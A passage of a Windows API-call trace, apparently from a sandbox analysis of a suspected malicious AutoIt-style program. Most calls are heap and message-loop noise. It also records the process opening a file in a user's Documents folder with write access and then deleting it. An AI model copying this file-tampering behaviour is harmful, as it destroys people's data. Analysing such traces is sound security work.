(in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.680] CharLowerBuffW (in: lpsz="byte[29926]", cchLength=0xb | out: lpsz="byte[29926]") returned 0xb [0036.680] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.680] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0036.680] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.680] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0036.680] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0036.681] FreeLibrary (hLibModule=0x76b40000) returned 1 [0036.681] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.681] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.681] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.681] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0036.681] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.681] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.681] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.681] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.681] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.681] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.681] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.681] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.681] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.681] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.681] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.681] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.681] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.681] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.682] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.682] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.682] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0036.682] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.682] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0036.682] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0036.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0036.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0036.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0036.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0036.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0036.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0036.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0036.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0036.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0036.683] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.683] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.683] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.683] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0036.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.683] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.684] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.684] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.684] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0036.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0036.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0036.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0036.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0036.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0036.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0036.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0036.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0036.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0036.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0036.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0036.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0036.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0036.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0036.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0036.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0036.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0036.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0036.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0036.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0036.685] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.685] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.685] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.685] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.685] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0036.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0036.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.685] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.685] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.685] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.686] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0036.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0036.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0036.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0036.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0036.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0036.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0036.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0036.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0036.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0036.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0036.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.686] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.686] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.686] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.686] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", lpFilePart=0x0) returned 0x45 [0036.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.686] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x1593a680, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="folder.ico", cAlternateFileName="")) returned 0x7c2240 [0036.686] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico")) returned 1 [0036.687] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x1593a680, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="folder.ico", cAlternateFileName="")) returned 0 [0036.688] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0036.688] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0036.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0036.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0036.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0036.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0036.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0036.689] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0036.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0036.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0036.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0036.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0036.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0036.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.689] HeapFree 